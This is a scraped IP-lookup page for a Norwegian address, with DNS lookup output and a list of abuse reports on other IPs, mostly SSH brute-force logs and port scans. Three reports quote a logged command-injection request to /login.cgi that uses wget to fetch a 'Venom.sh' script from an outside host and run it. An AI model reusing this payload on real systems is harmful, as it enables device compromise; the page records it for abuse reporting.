139.115.172.221

Basic Info

City: unknown

Region: unknown

Country: Norway

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 139.115.172.221
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14105
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;139.115.172.221.		IN	A

;; AUTHORITY SECTION:
.			410	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2024060402 1800 900 604800 86400

;; Query time: 17 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Jun 05 07:16:58 CST 2024
;; MSG SIZE  rcvd: 108

Host info

221.172.115.139.in-addr.arpa domain name pointer tietoevry-owned-address-139-115-172-x.hidden-host.tietoevry.com.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
221.172.115.139.in-addr.arpa	name = tietoevry-owned-address-139-115-172-x.hidden-host.tietoevry.com.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
94.191.105.218	attackbots	firewall-block, port(s): 6379/tcp	2019-12-23 23:01:28
140.255.141.216	attackbotsspam	Dec 23 01:13:41 esmtp postfix/smtpd[20260]: lost connection after AUTH from unknown[140.255.141.216] Dec 23 01:13:46 esmtp postfix/smtpd[20441]: lost connection after AUTH from unknown[140.255.141.216] Dec 23 01:13:52 esmtp postfix/smtpd[20320]: lost connection after AUTH from unknown[140.255.141.216] Dec 23 01:13:55 esmtp postfix/smtpd[20439]: lost connection after AUTH from unknown[140.255.141.216] Dec 23 01:13:58 esmtp postfix/smtpd[20260]: lost connection after AUTH from unknown[140.255.141.216] ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=140.255.141.216	2019-12-23 22:50:23
94.177.246.39	attackspambots	2019-12-23T13:27:44.600399centos sshd\[18134\]: Invalid user database from 94.177.246.39 port 34458 2019-12-23T13:27:44.612572centos sshd\[18134\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.177.246.39 2019-12-23T13:27:46.696425centos sshd\[18134\]: Failed password for invalid user database from 94.177.246.39 port 34458 ssh2	2019-12-23 22:52:32
175.183.49.166	attackspambots	" "	2019-12-23 22:41:19
123.16.129.68	attackbotsspam	1577082222 - 12/23/2019 07:23:42 Host: 123.16.129.68/123.16.129.68 Port: 445 TCP Blocked	2019-12-23 22:22:50
49.88.112.55	attack	SSH login attempts	2019-12-23 22:44:00
80.211.128.151	attackspambots	2019-12-23 11:25:45,419 fail2ban.actions: WARNING [ssh] Ban 80.211.128.151	2019-12-23 22:53:37
156.214.168.248	attackbots	1 attack on wget probes like: 156.214.168.248 - - [22/Dec/2019:15:25:20 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 22:38:04
182.150.58.161	attackbotsspam	Port 1433 Scan	2019-12-23 22:25:19
182.61.175.71	attackbotsspam	Dec 23 11:40:19 sd-53420 sshd\[18424\]: User root from 182.61.175.71 not allowed because none of user's groups are listed in AllowGroups Dec 23 11:40:19 sd-53420 sshd\[18424\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.61.175.71 user=root Dec 23 11:40:21 sd-53420 sshd\[18424\]: Failed password for invalid user root from 182.61.175.71 port 59172 ssh2 Dec 23 11:46:12 sd-53420 sshd\[20452\]: Invalid user masako from 182.61.175.71 Dec 23 11:46:12 sd-53420 sshd\[20452\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.61.175.71 ...	2019-12-23 22:30:52
156.206.0.191	attackbotsspam	1 attack on wget probes like: 156.206.0.191 - - [22/Dec/2019:22:08:39 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 22:36:01
178.62.26.232	attackbotsspam	10 attempts against mh-misc-ban on heat.magehost.pro	2019-12-23 22:46:43
183.171.111.50	attackspam	Automatic report - Port Scan Attack	2019-12-23 22:39:07
148.70.94.56	attack	Dec 23 08:36:38 scivo sshd[17151]: Invalid user nordmark from 148.70.94.56 Dec 23 08:36:38 scivo sshd[17151]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=148.70.94.56 Dec 23 08:36:40 scivo sshd[17151]: Failed password for invalid user nordmark from 148.70.94.56 port 46040 ssh2 Dec 23 08:36:41 scivo sshd[17151]: Received disconnect from 148.70.94.56: 11: Bye Bye [preauth] Dec 23 08:46:13 scivo sshd[17733]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=148.70.94.56 user=r.r Dec 23 08:46:15 scivo sshd[17733]: Failed password for r.r from 148.70.94.56 port 57142 ssh2 Dec 23 08:46:15 scivo sshd[17733]: Received disconnect from 148.70.94.56: 11: Bye Bye [preauth] Dec 23 08:54:14 scivo sshd[18095]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=148.70.94.56 user=r.r Dec 23 08:54:16 scivo sshd[18095]: Failed password for r.r from 148.70.94.56 port 36........ -------------------------------	2019-12-23 22:56:39
156.206.96.121	attackbotsspam	1 attack on wget probes like: 156.206.96.121 - - [22/Dec/2019:04:26:37 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 22:51:14

Recently Reported IPs

56.163.31.83	36.240.5.187	21.210.55.173	247.130.120.8
156.165.103.175	146.49.231.211	145.46.108.151	30.156.2.231
18.127.75.151	32.72.131.238	65.251.160.184	146.49.216.73
87.126.55.112	63.244.36.121	225.99.109.93	229.24.27.38
116.214.172.236	45.109.44.72	129.234.242.142	180.13.242.0